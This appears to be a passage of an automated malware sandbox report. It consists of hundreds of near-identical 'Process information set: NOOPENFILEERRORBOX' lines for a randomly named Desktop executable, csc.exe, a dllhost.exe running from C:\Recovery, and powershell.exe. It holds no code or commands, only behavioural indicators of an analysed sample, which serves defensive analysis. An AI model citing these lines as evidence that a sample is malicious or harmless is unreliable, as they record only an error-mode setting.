                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
